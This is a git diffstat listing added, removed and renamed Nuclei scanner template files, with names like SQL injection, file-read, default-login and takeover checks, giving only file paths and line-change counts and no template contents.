.../Other/azure-takeover-detection-681.yaml | 43 + .../Other/azure-takeover-detection.yaml | 40 - ...Builder-sqli.yaml => b2bbuilder-sqli.yaml} | 0 ...anel-685.yaml => barracuda-panel-684.yaml} | 0 .../{baseurl (copy 1).yaml => baseurl.yaml} | 0 ...ors-misconfig.yaml => basic-cors-692.yaml} | 0 nuclei-templates/Other/basic_sqli.yaml | 39 - ...r-login-703.yaml => bazarr-login-702.yaml} | 0 nuclei-templates/Other/bems-api-lfi-710.yaml | 20 + nuclei-templates/Other/bems-api-lfi-711.yaml | 24 - .../Other/beward-ipcamera-disclosure-715.yaml | 28 - .../Other/beward-ipcamera-disclosure.yaml | 30 + .../Other/beyondtrust-login-server-718.yaml | 31 - .../Other/beyondtrust-login-server.yaml | 31 + ...-panel-721.yaml => beyondtrust-panel.yaml} | 0 .../Other/bigbluebutton-detect-723.yaml | 24 + .../Other/bigbluebutton-detect.yaml | 25 - .../Other/bigbluebutton-login-726.yaml | 28 + .../Other/bigbluebutton-login.yaml | 36 - ...l => bigip-config-utility-detect-733.yaml} | 0 nuclei-templates/Other/bigip.yaml | 66 + nuclei-templates/Other/bingmaps.yaml | 20 + ...-detect.yaml => biometric-detect-737.yaml} | 0 ...eover.yaml => bitbucket-takeover-739.yaml} | 0 nuclei-templates/Other/bitrix-panel-746.yaml | 34 - nuclei-templates/Other/bitrix-panel-749.yaml | 32 + ...ogin-753.yaml => blue-iris-login-751.yaml} | 0 .../Other/blue-ocean-excellence-lfi.yaml | 8 +- nuclei-templates/Other/blue-yonder-panel.yaml | 2 +- ...cms-panel.yaml => bolt-cms-panel-763.yaml} | 0 nuclei-templates/Other/booked.yaml | 58 - .../Other/bookstack-detect-765.yaml | 30 - nuclei-templates/Other/bookstack-detect.yaml | 30 + nuclei-templates/Other/bower-json-770.yaml | 31 - nuclei-templates/Other/bower-json.yaml | 31 + ...n.yaml => braintree-access-token-771.yaml} | 0 .../{branch-key.yaml => branch-key-774.yaml} | 0 .../Other/brightcove-takeover-785.yaml | 19 + .../Other/brightcove-takeover.yaml | 16 - ...0.yaml => brother-printer-detect-789.yaml} | 0 ...794.yaml => browserless-debugger-795.yaml} | 0 nuclei-templates/Other/bsqli-time-based.yaml | 35 - nuclei-templates/Other/buddy-panel-797.yaml | 26 - nuclei-templates/Other/buddy-panel.yaml | 30 + ...yaml => buffalo-config-injection-801.yaml} | 0 .../Other/buildbot-panel-803.yaml | 25 + nuclei-templates/Other/buildbot-panel.yaml | 28 - .../Other/bullwark-momentum-lfi-807.yaml | 29 + .../Other/bullwark-momentum-lfi-808.yaml | 33 - ...usinessintelligence-default-login-814.yaml | 45 + ...usinessintelligence-default-login-816.yaml | 49 - nuclei-templates/Other/buttercms.yaml | 16 + .../Other/cache-poisoning-822.yaml | 33 - .../Other/cache-poisoning-823.yaml | 23 + ...acti-detect-827.yaml => cacti-detect.yaml} | 0 nuclei-templates/Other/cacti-panel-828.yaml | 40 + nuclei-templates/Other/cacti-panel-829.yaml | 40 - .../cacti-weathermap-file-write-833.yaml | 4 + .../Other/caddy-open-redirect-837.yaml | 8 +- ...break-cms.yaml => call-break-cms-838.yaml} | 0 .../Other/campaignmonitor-843.yaml | 7 +- .../Other/camunda-login-panel-845.yaml | 31 - .../Other/camunda-login-panel.yaml | 31 + ...-dns-853.yaml => can-i-take-over-dns.yaml} | 0 ...-846.yaml => canal-default-login-849.yaml} | 0 ...-takeover.yaml => canny-takeover-855.yaml} | 0 .../Other/cargo-takeover-868.yaml | 18 - .../Other/cargo-takeover-869.yaml | 16 + ...yaml => cargocollective-takeover-864.yaml} | 0 ... => caucho-resin-info-disclosure-871.yaml} | 0 ...n-detect-875.yaml => centreon-detect.yaml} | 0 nuclei-templates/Other/ceph.yaml | 19 + .../Other/certificate-validation-884.yaml | 12 + .../Other/certificate-validation.yaml | 16 - nuclei-templates/Other/cgi-printenv-886.yaml | 11 +- ...t-page-887.yaml => cgi-test-page-888.yaml} | 0 ...ms-sqli-891.yaml => chamilo-lms-sqli.yaml} | 0 .../Other/chamilo-lms-xss-893.yaml | 27 - nuclei-templates/Other/chamilo-lms-xss.yaml | 27 + ...et-CRM-sqli.yaml => chanjet-crm-sqli.yaml} | 0 ...cheatset-disclosure.yaml => cheatset.yaml} | 0 ...rx-panel.yaml => checkmarx-panel-895.yaml} | 0 .../Other/chevereto-detect-905.yaml | 26 + nuclei-templates/Other/chevereto-detect.yaml | 32 - .../Other/chinaunicom-default-login-908.yaml | 33 + .../Other/chinaunicom-default-login-909.yaml | 28 - .../Other/circarlife-setup-921.yaml | 15 +- .../Other/circleci-config-924.yaml | 25 - nuclei-templates/Other/circleci-config.yaml | 25 + .../Other/cisco-asa-panel-935.yaml | 6 +- ...-938.yaml => cisco-finesse-login-940.yaml} | 0 .../Other/cisco-network-config-948.yaml | 24 - .../Other/cisco-network-config-949.yaml | 24 + ...960.yaml => cisco-secure-desktop-962.yaml} | 0 .../Other/cisco-sendgrid-965.yaml | 30 + .../Other/cisco-sendgrid-969.yaml | 31 - .../Other/cisco-smi-exposure-970.yaml | 33 - .../Other/cisco-smi-exposure-971.yaml | 33 + ...-975.yaml => cisco-systems-login-973.yaml} | 0 ...sence-978.yaml => cisco-telepresence.yaml} | 0 ...ogin-979.yaml => cisco-ucs-kvm-login.yaml} | 0 .../Other/citrix-vpn-detect-984.yaml | 16 - .../Other/citrix-vpn-detect-987.yaml | 16 + ...s-990.yaml => ckan-dom-based-xss-992.yaml} | 0 ...el-996.yaml => clave-login-panel-994.yaml} | 0 .../Other/clearpass-policy-manager-997.yaml | 23 - .../Other/clearpass-policy-manager.yaml | 24 + nuclei-templates/Other/cleo-detect.yaml | 41 + ...nauth-1004.yaml => clickhouse-unauth.yaml} | 0 .../Other/clientaccesspolicy-1006.yaml | 25 - .../Other/clientaccesspolicy.yaml | 25 + .../Other/clockwatch-enterprise-rce-1009.yaml | 18 +- .../clockwork-dashboard-exposure-1012.yaml | 27 - .../clockwork-dashboard-exposure-1014.yaml | 30 + ...page-1016.yaml => clockwork-php-page.yaml} | 0 .../Other/cloudflare-image-ssrf-1022.yaml | 25 - .../Other/cloudflare-image-ssrf-1023.yaml | 22 + nuclei-templates/Other/cloudinary-1025.yaml | 13 - nuclei-templates/Other/cloudinary-1026.yaml | 16 + ...-open-rce.yaml => cmdi-ruby-open-rce.yaml} | 0 .../Other/cname-service-detection-1032.yaml | 12 +- ...-1033.yaml => cname-service-detector.yaml} | 0 ...93-1038.yaml => cnvd-2018-13393-1039.yaml} | 0 .../Other/cnvd-2019-01348-1040.yaml | 27 + .../Other/cnvd-2019-01348-1042.yaml | 32 - .../Other/cnvd-2019-06255-1048.yaml | 27 + .../Other/cnvd-2020-46552-1060.yaml | 32 - nuclei-templates/Other/cnvd-2020-46552.yaml | 34 + .../Other/cnvd-2020-56167-1061.yaml | 30 - .../Other/cnvd-2020-56167-1062.yaml | 25 + .../Other/cnvd-2020-62422-1065.yaml | 7 +- .../Other/cnvd-2020-67113-1072.yaml | 43 + .../Other/cnvd-2021-01931-1079.yaml | 33 + .../Other/cnvd-2021-10543-1082.yaml | 26 - ...36-1088.yaml => cnvd-2021-14536-1087.yaml} | 0 .../Other/cnvd-2021-15822-1093.yaml | 6 +- .../Other/cnvd-2021-15824-1096.yaml | 36 - .../Other/cnvd-2021-15824-1097.yaml | 28 + ...77-1105.yaml => cnvd-2021-28277-1107.yaml} | 0 .../Other/cnvd-2021-30167-1109.yaml | 38 - .../Other/cnvd-2021-30167-1110.yaml | 43 + .../Other/cnvd-2021-49104-1113.yaml | 43 - .../Other/cnvd-2021-49104-1114.yaml | 33 + .../Other/cnvd-2022-03672-1117.yaml | 42 + .../Other/cobbler-default-login-1118.yaml | 61 - .../Other/cobbler-default-login-1120.yaml | 72 + ...rkflow.yaml => cockpit-workflow-1129.yaml} | 0 .../Other/code42-log4j-rce-1131.yaml | 31 + .../Other/code42-log4j-rce-1132.yaml | 35 - .../Other/codeigniter-env-1133.yaml | 35 - .../Other/codeigniter-env-1134.yaml | 31 + ...aml => codemeter-webadmin-panel-1138.yaml} | 0 .../Other/cofense-vision-panel-1141.yaml | 20 + .../Other/cofense-vision-panel.yaml | 27 - ...yaml => cold-fusion-cfcache-map-1148.yaml} | 0 ...53.yaml => coldfusion-debug-xss-1155.yaml} | 0 ...aml => commax-credentials-disclosure.yaml} | 0 ...l => comtrend-password-exposure-1168.yaml} | 0 nuclei-templates/Other/concrete-xss-1177.yaml | 35 + nuclei-templates/Other/concrete-xss-1178.yaml | 30 - .../Other/concrete5-install-1171.yaml | 38 + nuclei-templates/Other/concrete5-install.yaml | 33 - ...5-panel-1173.yaml => concrete5-panel.yaml} | 0 nuclei-templates/Other/conditional-flow.yaml | 1 - nuclei-templates/Other/config-rb-1179.yaml | 30 + nuclei-templates/Other/config-rb-1180.yaml | 35 - nuclei-templates/Other/config.yaml | 716 + .../Other/configuration-listing-1182.yaml | 26 - .../Other/configuration-listing-1184.yaml | 51 + .../Other/confluence-detect-1186.yaml | 13 +- .../confluence-ssrf-sharelinks-1190.yaml | 39 - .../confluence-ssrf-sharelinks-1193.yaml | 31 + .../{contacam.yaml => contacam-1198.yaml} | 0 ...t-scheme-1204.yaml => content-scheme.yaml} | 0 .../Other/contentkeeper-detect-1203.yaml | 32 - .../Other/contentkeeper-detect.yaml | 31 + .../Other/core-chuangtian-cloud-rce-1209.yaml | 41 - .../Other/core-chuangtian-cloud-rce-1211.yaml | 37 + .../coremail-config-disclosure-1215.yaml | 24 + .../Other/coremail-config-disclosure.yaml | 27 - nuclei-templates/Other/cors.yaml | 71 +- .../Other/cortex-xsoar-login-1225.yaml | 23 - .../Other/cortex-xsoar-login.yaml | 24 + ...3.yaml => couchbase-buckets-api-1232.yaml} | 0 ...1237.yaml => couchdb-adminparty-1234.yaml} | 0 ...e-1239.yaml => couchdb-exposure-1241.yaml} | 0 .../Other/couchdb-fauxton-1244.yaml | 17 - nuclei-templates/Other/couchdb-fauxton.yaml | 17 + nuclei-templates/Other/craft-cms-detect.yaml | 3 +- ...el.yaml => craftcms-admin-panel-1245.yaml} | 0 .../Other/credential-exposure-1250.yaml | 720 + .../Other/credential-exposure-file.yaml | 715 - nuclei-templates/Other/credentials-1257.yaml | 5 +- .../Other/credentials-disclosure-1256.yaml | 712 - .../Other/crlf-injection-1260.yaml | 27 - .../Other/crlf-injection-1263.yaml | 27 + .../{CRMEB-sqli.yaml => crmeb-sqli.yaml} | 0 ...ml-1269.yaml => crossdomain-xml-1267.yaml} | 0 .../Other/crush-ftp-detect-1271.yaml | 21 + .../Other/crush-ftp-detect-1272.yaml | 41 - .../cs-cart-unauthenticated-lfi-1282.yaml | 27 - .../cs-cart-unauthenticated-lfi-1285.yaml | 25 + .../Other/cs141-default-login-1277.yaml | 44 - .../Other/cs141-default-login-1279.yaml | 50 + ...d-panel-1286.yaml => csod-panel-1289.yaml} | 0 ...t-1290.yaml => csrfguard-detect-1291.yaml} | 0 ...e-read.yaml => custom-solr-file-read.yaml} | 0 .../Other/custom-swagger-ui-detect.yaml | 28 + nuclei-templates/Other/custom_nuclei-9.yaml | 48 + .../Other/cx-cloud-login-6764.yaml | 18 - nuclei-templates/Other/cx-cloud-login.yaml | 18 + ...aml => d-link-arbitary-fileread-7042.yaml} | 0 .../Other/d-link-wireless-7047.yaml | 23 + .../Other/d-link-wireless-7048.yaml | 23 - .../dahua-wpms-addimgico-fileupload.yaml | 74 + ...-detect-6767.yaml => darkstat-detect.yaml} | 0 .../Other/database-error-6770.yaml | 7 +- ...-detect.yaml => daybyday-detect-6772.yaml} | 0 .../{db-schema.yaml => db-schema-6783.yaml} | 0 .../Other/dbeaver-credentials.yaml | 23 +- .../Other/dead-host-with-cname-6786.yaml | 23 - .../Other/dead-host-with-cname-6787.yaml | 29 + ... => dedecms-carbuyaction-fileinclude.yaml} | 0 .../Other/dedecms-membergroup-sqli-6798.yaml | 26 + .../Other/dedecms-membergroup-sqli.yaml | 22 - ...ct.yaml => dedecms-openredirect-6803.yaml} | 0 .../Other/default-apache2-page-6805.yaml | 17 + .../Other/default-apache2-page.yaml | 19 - ... => default-apache2-ubuntu-page-6810.yaml} | 0 .../Other/default-asp-net-page-6822.yaml | 16 - .../Other/default-asp-net-page-6825.yaml | 17 + .../Other/default-centos-test-page.yaml | 5 +- .../Other/default-codeigniter-page-6830.yaml | 7 +- ....yaml => default-detect-generic-6839.yaml} | 0 .../Other/default-django-page-6840.yaml | 18 - .../Other/default-django-page.yaml | 17 + ...ge.yaml => default-fastcgi-page-6846.yaml} | 0 ...age.yaml => default-fedora-page-6850.yaml} | 0 .../default-glassfish-server-page-6854.yaml | 17 - .../Other/default-glassfish-server-page.yaml | 18 + ...yaml => default-ibm-http-server-6857.yaml} | 0 nuclei-templates/Other/default-iis7-page.yaml | 18 - .../Other/default-jetty-page-6862.yaml | 18 - .../Other/default-jetty-page-6863.yaml | 17 + ...e-6867.yaml => default-lighttpd-page.yaml} | 0 ...6871.yaml => default-lucee-page-6870.yaml} | 0 .../default-microsoft-azure-page-6873.yaml | 18 + .../Other/default-microsoft-azure-page.yaml | 17 - ...-6885.yaml => default-openresty-6884.yaml} | 0 .../default-oracle-application-page-6889.yaml | 20 + .../default-oracle-application-page-6892.yaml | 19 - .../Other/default-plesk-page-6898.yaml | 17 + .../Other/default-plesk-page-6899.yaml | 18 - ...aml => default-redhat-test-page-6903.yaml} | 0 ...aml => default-ssltls-test-page-6907.yaml} | 0 ...age.yaml => default-tomcat-page-6911.yaml} | 0 .../default-windows-server-page-6912.yaml | 18 - .../Other/default-windows-server-page.yaml | 17 + ...aml => dell-idrac-default-login-6943.yaml} | 0 ...tect-6918.yaml => dell-idrac6-detect.yaml} | 0 ...6923.yaml => dell-idrac7-detect-6924.yaml} | 0 .../Other/dell-idrac8-detect-6926.yaml | 29 + .../Other/dell-idrac8-detect-6927.yaml | 25 - ...ml => dell-idrac9-default-login-6934.yaml} | 0 ...6938.yaml => dell-idrac9-detect-6937.yaml} | 0 .../Other/dell-openmanager-login-6949.yaml | 23 + .../Other/dell-openmanager-login-6951.yaml | 26 - .../Other/dell-wyse-login-6955.yaml | 2 +- .../Other/deprecated-sshv1-detection.yaml | 20 - ...cam-login.yaml => dericam-login-6960.yaml} | 0 .../detect-addpac-voip-gateway-6963.yaml | 30 + .../detect-addpac-voip-gateway-6965.yaml | 30 - .../Other/detect-dangling-cname-6966.yaml | 34 + .../Other/detect-dangling-cname-6968.yaml | 32 - ...s.yaml => detect-dns-over-https-6970.yaml} | 0 .../Other/detect-drone-config-6972.yaml | 26 + .../Other/detect-drone-config.yaml | 22 - .../Other/detect-jabber-xmpp-6975.yaml | 24 - .../Other/detect-jabber-xmpp.yaml | 24 + .../Other/detect-options-method-6977.yaml | 19 - .../Other/detect-options-method.yaml | 19 + .../Other/detect-rsyncd-6981.yaml | 3 +- ...ntry-6984.yaml => detect-sentry-6985.yaml} | 0 .../Other/detection-elasticsearch.yaml | 48 - ...s-6989.yaml => development-logs-6987.yaml} | 0 nuclei-templates/Other/diarise-theme-lfi.yaml | 26 - .../Other/dicoogle-pacs-lfi-6994.yaml | 25 + nuclei-templates/Other/dicoogle-pacs-lfi.yaml | 22 - .../Other/digitalrebar-traversal-6996.yaml | 33 + .../Other/digitalrebar-traversal.yaml | 33 - .../Other/dir-850l-login-panel.yaml | 30 - nuclei-templates/Other/dir-listing-7005.yaml | 16 + nuclei-templates/Other/dir-listing-7008.yaml | 23 - ...yaml => directadmin-login-panel-7000.yaml} | 0 .../Other/discourse-xss-7013.yaml | 24 - .../Other/discourse-xss-7014.yaml | 24 + ...cuz-V72-SQLi.yaml => discuz-v72-sqli.yaml} | 0 .../Other/display-via-header-7015.yaml | 2 +- .../Other/dixell-xweb500-filewrite-7018.yaml | 35 + .../Other/dixell-xweb500-filewrite.yaml | 31 - .../Other/django-admin-panel-7023.yaml | 16 - .../Other/django-admin-panel.yaml | 18 + .../Other/django-debug-detect-7024.yaml | 25 + .../Other/django-debug-exposure-7029.yaml | 28 + .../Other/django-debug-exposure.yaml | 24 - nuclei-templates/Other/django-debug.yaml | 26 - .../django-framework-exceptions-7034.yaml | 33 - .../Other/django-framework-exceptions.yaml | 30 + nuclei-templates/Other/django-secret-key.yaml | 31 + nuclei-templates/Other/django-secret.key.yaml | 46 - ...sed-hosts-10169.yaml => dns-takeover.yaml} | 0 ...ect-7054.yaml => dns-waf-detect-7052.yaml} | 0 .../Other/docker-compose-config-7059.yaml | 26 + .../Other/docker-compose-config.yaml | 31 - .../Other/docker-registry-7064.yaml | 20 - .../Other/docker-registry-7067.yaml | 23 + ...-detect.yaml => dolibarr-detect-7071.yaml} | 0 nuclei-templates/Other/dom-xss-7079.yaml | 43 - nuclei-templates/Other/dom-xss-7080.yaml | 45 + nuclei-templates/Other/domcfg-page.yaml | 5 +- ...-detect.yaml => dotclear-detect-7084.yaml} | 0 .../Other/dotcms-admin-panel-7085.yaml | 18 - .../Other/dotcms-admin-panel-7087.yaml | 18 + .../Other/dotnetcms-sqli-7089.yaml | 29 + .../Other/drone-ci-panel-7090.yaml | 24 + nuclei-templates/Other/drone-ci-panel.yaml | 20 - .../Other/{api-dropbox.yaml => dropbox.yaml} | 0 .../Other/druid-console-exposure-7094.yaml | 4 +- ...itor-7100.yaml => druid-monitor-7104.yaml} | 0 nuclei-templates/Other/drupal.yaml | 25 + nuclei-templates/Other/ds-store-file.yaml | 29 + nuclei-templates/Other/ds_store-7119.yaml | 42 - .../Other/dubbo-admin-default-login-7120.yaml | 41 - .../Other/dubbo-admin-default-login.yaml | 34 + nuclei-templates/Other/dufs-detect.yaml | 2 +- .../Other/duomicms-sql-injection-7122.yaml | 11 +- .../Other/dvwa-default-login-7126.yaml | 53 - .../Other/dvwa-default-login-7129.yaml | 45 + .../dvwa-headless-automatic-login-7130.yaml | 43 + .../dvwa-headless-automatic-login-7132.yaml | 43 - .../Other/dwr-921-login-panel.yaml | 25 + ...detect.yaml => dwr-index-detect-7135.yaml} | 0 ...l => dynamic-broadcast-receiver-7141.yaml} | 0 ...-panel.yaml => dynamicweb-panel-7144.yaml} | 0 ...e-token.yaml => dynatrace-token-7146.yaml} | 0 .../Other/easy-media-gallery-pro-listing.yaml | 48 - .../Other/easycvr-arbitrary-file-read.yaml | 47 + .../eatery-restaurant-open-redirect.yaml | 20 + .../ecology-arbitrary-file-upload-7169.yaml | 38 - .../Other/ecology-arbitrary-file-upload.yaml | 44 + ...filedownload-directory-traversal-7172.yaml | 3 +- ...cology-oa-HrmCareerApplyPerView-sqli.yaml} | 0 ...ngframework-directory-traversal-7174.yaml} | 0 ...77.yaml => ecology-syncuserinfo-sqli.yaml} | 0 nuclei-templates/Other/ecshop-sqli-7180.yaml | 27 + nuclei-templates/Other/ecshop-sqli.yaml | 28 - ...-7183.yaml => eg-manager-detect-7184.yaml} | 0 .../Other/elFinder-path-traversal.yaml | 27 + .../Other/elasticbeantalk-takeover-7188.yaml | 49 - .../Other/elasticbeantalk-takeover.yaml | 42 + .../Other/elasticsearch-7196.yaml | 22 + ...elasticsearch-sql-client-detect-7191.yaml} | 0 ...ct-7202.yaml => elfinder-detect-7201.yaml} | 0 .../Other/elfinder-path-traversal(1).yaml | 38 - ...ersion.yaml => elfinder-version-7204.yaml} | 0 .../Other/email-extraction-7210.yaml | 22 - nuclei-templates/Other/email-extraction.yaml | 22 + .../Other/emcecom-default-login-7212.yaml | 32 + .../Other/emcecom-default-login-7214.yaml | 38 - ...ist-sqli.yaml => empirecms-list-sqli.yaml} | 0 ...ate-sqli.yaml => empirecms-rate-sqli.yaml} | 0 .../Other/empirecms-xss-7218.yaml | 25 - .../Other/empirecms-xss-7220.yaml | 20 + .../Other/ems-login-panel-7225.yaml | 22 + nuclei-templates/Other/ems-login-panel.yaml | 22 - .../enable-secret-for-password-user-and-.yaml | 22 - .../enable-secret-for-user-and-password.yaml | 26 + .../Other/entrust-identityguard.yaml | 19 + .../{env-exposed.yaml => env_exposed.yaml} | 0 .../Other/envision-gateway-7226.yaml | 24 + nuclei-templates/Other/envision-gateway.yaml | 22 - .../Other/epson-access-detect-7233.yaml | 32 + .../Other/epson-access-detect.yaml | 34 - .../Other/epson-projector-detect-7238.yaml | 26 + .../Other/epson-projector-detect.yaml | 26 - .../Other/epson-web-control-detect-7239.yaml | 25 - .../Other/epson-web-control-detect-7241.yaml | 28 + .../erp-nc-directory-traversal-7245.yaml | 23 - .../erp-nc-directory-traversal-7247.yaml | 27 + .../Other/error-based-sql-injection-7249.yaml | 2 +- nuclei-templates/Other/error-logs-7251.yaml | 2 +- .../Other/esmtprc-config-7258.yaml | 13 +- nuclei-templates/Other/etc-file-read.yaml | 174 +- .../{etcd-keys.yaml => etcd-keys-7262.yaml} | 0 .../Other/etouch-v2-sqli-7267.yaml | 22 + .../Other/etouch-v2-sqli-7268.yaml | 22 - .../ewebs-arbitrary-file-reading-7271.yaml | 31 - .../Other/ewebs-arbitrary-file-reading.yaml | 26 + ...ml => exacqvision-default-login-7275.yaml} | 0 nuclei-templates/Other/exposed-adb-7280.yaml | 22 - nuclei-templates/Other/exposed-adb-7281.yaml | 28 + ...ing-7284.yaml => exposed-alps-spring.yaml} | 0 ...eeper-7291.yaml => exposed-bitkeeper.yaml} | 0 ...sed-darcs.yaml => exposed-darcs-7298.yaml} | 0 .../Other/exposed-docker-api.yaml | 35 +- .../Other/exposed-gitignore-7303.yaml | 35 - .../Other/exposed-gitignore-7306.yaml | 35 + ...307.yaml => exposed-glances-api-7308.yaml} | 0 .../exposed-jquery-file-upload-7313.yaml | 3 - .../Other/exposed-kafdrop-7316.yaml | 19 + nuclei-templates/Other/exposed-kafdrop.yaml | 19 - ...4.yaml => exposed-mysql-initial-7323.yaml} | 0 .../Other/exposed-nomad-7329.yaml | 26 - .../Other/exposed-nomad-7330.yaml | 40 + ...ml => exposed-pagespess-global-admin.yaml} | 0 .../Other/exposed-redis-7335.yaml | 6 +- ...343.yaml => exposed-service-now-7340.yaml} | 0 .../Other/exposed-sharepoint-list-7345.yaml | 28 - .../Other/exposed-sharepoint-list-7348.yaml | 28 + ...-7350.yaml => exposed-sqlite-manager.yaml} | 0 nuclei-templates/Other/exposed-svn-7351.yaml | 23 + nuclei-templates/Other/exposed-svn-7352.yaml | 23 - nuclei-templates/Other/exposed-swagger.yaml | 85 + .../Other/exposed-webalizer-7360.yaml | 18 - nuclei-templates/Other/exposed-webalizer.yaml | 18 + .../Other/exposed-zookeeper-7362.yaml | 22 - .../Other/exposed-zookeeper-7365.yaml | 18 + ...express-lfr.yaml => express-lfr-json.yaml} | 0 .../Other/express-lfr-post (copy 1).yaml | 4 +- nuclei-templates/Other/exsi-system-7366.yaml | 23 - nuclei-templates/Other/exsi-system.yaml | 23 + nuclei-templates/Other/extract-urls-7369.yaml | 39 +- .../Other/extreme-netconfig-ui-7371.yaml | 4 - ...no-lfd.yaml => eyelock-nano-lfd-7375.yaml} | 0 .../Other/eyou-email-rce-7380.yaml | 28 - .../Other/eyou-email-rce-7383.yaml | 28 + .../Other/facebook-client-id-7385.yaml | 16 + .../Other/facebook-client-id.yaml | 16 - ...gweicms-SQLi.yaml => fangweicms-sqli.yaml} | 0 .../fanruan-channel-deserialization.yaml | 54 - .../Other/fanruan-deserialization.yaml | 29 + .../Other/fanruanoa-detect-7391.yaml | 23 - nuclei-templates/Other/fanruanoa-detect.yaml | 24 + ...aml => fanruanoa2012-disclosure-7390.yaml} | 0 ...-docs-7399.yaml => fastapi-docs-7398.yaml} | 0 .../Other/fastjson-1-2-47-rce-7415.yaml | 40 + .../Other/fastjson-1-2-47-rce.yaml | 44 - .../Other/fastjson-1-2-62-rce-7419.yaml | 30 + .../Other/fastjson-1-2-62-rce-7420.yaml | 34 - ...423.yaml => fastjson-1-2-67-rce-7424.yaml} | 0 ...rce.yaml => fastjson-1-2-68-rce-7425.yaml} | 0 .../Other/fastjson-version-7428.yaml | 26 - nuclei-templates/Other/fastjson-version.yaml | 27 + .../Other/fastly-takeover-7430.yaml | 18 + nuclei-templates/Other/fastly-takeover.yaml | 18 - ...nel-7435.yaml => fatpipe-ipvpn-panel.yaml} | 0 .../Other/favicon-detection-7442.yaml | 2562 - nuclei-templates/Other/favicon-detection.yaml | 2026 + ...rver-key.yaml => fcm-server-key-7450.yaml} | 0 .../Other/feedpress-takeover-7457.yaml | 18 + .../Other/feedpress-takeover.yaml | 15 - ...eicms-lfr.yaml => feifeicms-lfr-7463.yaml} | 0 nuclei-templates/Other/filezilla.yaml | 1 - .../Other/finereport-path-traversal-7478.yaml | 31 - .../Other/finereport-path-traversal.yaml | 27 + ...on-7484.yaml => fiorilaunchpad-logon.yaml} | 0 ...aml => firebase-config-exposure-7487.yaml} | 0 .../Other/firebase-database-7489.yaml | 17 - .../Other/firebase-database-7490.yaml | 17 + .../Other/firebase-urls-7499.yaml | 19 - nuclei-templates/Other/firebase_urls.yaml | 23 + ...ireware-xtm-user-authentication-7501.yaml} | 0 .../Other/flexbe-takeover-7505.yaml | 4 + ...-panel.yaml => flightpath-panel-7508.yaml} | 0 ...exposure.yaml => flink-exposure-7509.yaml} | 0 nuclei-templates/Other/flink.yaml | 20 - .../Other/flir-default-login-7514.yaml | 8 + ...sal-7523.yaml => flir-path-traversal.yaml} | 0 .../flow-flow-social-stream-xss.yaml | 0 ...eover.yaml => flywheel-takeover-7526.yaml} | 0 nuclei-templates/Other/forcepoint-7529.yaml | 30 + ...e-7527.yaml => forcepoint-applicance.yaml} | 0 nuclei-templates/Other/forcepoint.yaml | 30 - .../Other/fortianalyzer-certificate.yaml | 32 + .../Other/fortiauthenticator.yaml | 32 + nuclei-templates/Other/fortiddos.yaml | 32 + .../Other/fortigate-certificate.yaml | 26 + ...el-7531.yaml => fortimail-panel-7532.yaml} | 0 .../Other/fortimanager-certificate.yaml | 33 + .../Other/fortiwifi-certificate.yaml | 31 + .../foulenzer-subdomain-tk (copy 1).yaml | 363 - nuclei-templates/Other/freelancer.yaml | 34 - .../Other/freshdesk-takeover-7540.yaml | 22 - .../Other/freshdesk-takeover-7541.yaml | 22 + .../Other/front-page-misconfig-7547.yaml | 22 + .../Other/front-page-misconfig-7549.yaml | 16 - ...eover.yaml => frontify-takeover-7543.yaml} | 0 ...login-7559.yaml => frp-default-login.yaml} | 0 ...ver-listDir.yaml => frserver-listdir.yaml} | 0 ...aml => ftp-credentials-exposure-7568.yaml} | 0 .../Other/ftp-default-credentials.yaml | 33 - nuclei-templates/Other/ftp-default-creds.yaml | 22 + .../Other/ftp-weak-credentials-7569.yaml | 70 +- .../{ftpconfig-7565.yaml => ftpconfig.yaml} | 0 .../Other/fuelcms-default-login-7571.yaml | 54 + .../Other/fuelcms-default-login.yaml | 56 - .../Other/fuzz-reflection-xss.yaml | 31 - .../Other/ganglia-xml-grid-monitor-7573.yaml | 26 - .../Other/ganglia-xml-grid-monitor-7574.yaml | 26 + .../Other/gcp-service-account-7575.yaml | 16 - .../Other/gemfury-takeover-7577.yaml | 5 +- .../Other/general-tokens-7586.yaml | 85 +- ...x-lfi-7589.yaml => generic-linux-lfi.yaml} | 0 .../Other/generic-windows-lfi-7590.yaml | 29 - .../Other/generic-windows-lfi.yaml | 32 + ...7594.yaml => geoserver-default-login.yaml} | 0 .../geovision-geowebserver-lfi-7595.yaml | 30 + .../Other/geovision-geowebserver-lfi-xss.yaml | 50 - .../Other/geovision-geowebserver-lfi.yaml | 32 - .../geovision-geowebserver-xss-7600.yaml | 28 + .../geovision-geowebserver-xss-7601.yaml | 34 - .../Other/geowebserver-lfi-xss.yaml | 50 + ...e-detect.yaml => gespage-detect-7603.yaml} | 0 nuclei-templates/Other/get.yaml | 15 - ...09.yaml => getresponse-takeover-7607.yaml} | 0 .../Other/getsimple-cms-detect-7615.yaml | 28 + .../Other/getsimple-cms-detect.yaml | 24 - ....yaml => getsimple-cms-detector-7612.yaml} | 0 ....yaml => getsimple-installation-7618.yaml} | 0 nuclei-templates/Other/ghe-encrypt-saml.yaml | 33 - nuclei-templates/Other/ghe-saml.yaml | 33 + .../Other/ghost-takeover-7620.yaml | 16 + nuclei-templates/Other/ghost-takeover.yaml | 16 - nuclei-templates/Other/git-config-7636.yaml | 29 +- .../git-config-nginxoffbyslash-7629.yaml | 30 + .../Other/git-config-nginxoffbyslash.yaml | 25 - ...l => git-credentials-disclosure-7641.yaml} | 0 nuclei-templates/Other/gitea-login.yaml | 4 +- .../Other/github-enterprise-detect-7650.yaml | 19 + .../Other/github-enterprise-detect.yaml | 19 - ...es-7653.yaml => github-gemfile-files.yaml} | 0 .../Other/github-page-config-7654.yaml | 26 + .../Other/github-page-config.yaml | 26 - .../Other/github-takeover-7659.yaml | 24 - .../Other/github-takeover-7662.yaml | 20 + .../github-workflows-disclosure-7665.yaml | 54 + .../github-workflows-disclosure-7666.yaml | 51 - .../Other/gitlab-api-user-enum-7669.yaml | 15 +- ...ab-detect.yaml => gitlab-detect-7672.yaml} | 0 ...pos-7678.yaml => gitlab-public-repos.yaml} | 0 .../Other/gitlab-public-signup.yaml | 8 +- ...-7690.yaml => gitlab-public-snippets.yaml} | 0 nuclei-templates/Other/gitlab-rce-7691.yaml | 63 - nuclei-templates/Other/gitlab-rce-7693.yaml | 63 + .../Other/gitlab-uninitialized-password.yaml | 11 +- .../Other/gitlab-user-enum-7699.yaml | 30 - .../Other/gitlab-user-enum-7700.yaml | 32 + ...login.yaml => gitlab-weak-login-7707.yaml} | 0 ...orkflow-7708.yaml => gitlab-workflow.yaml} | 0 ...sure-7709.yaml => gitlist-disclosure.yaml} | 0 .../Other/global-domains-lfi-7714.yaml | 25 + .../Other/global-domains-lfi.yaml | 21 - 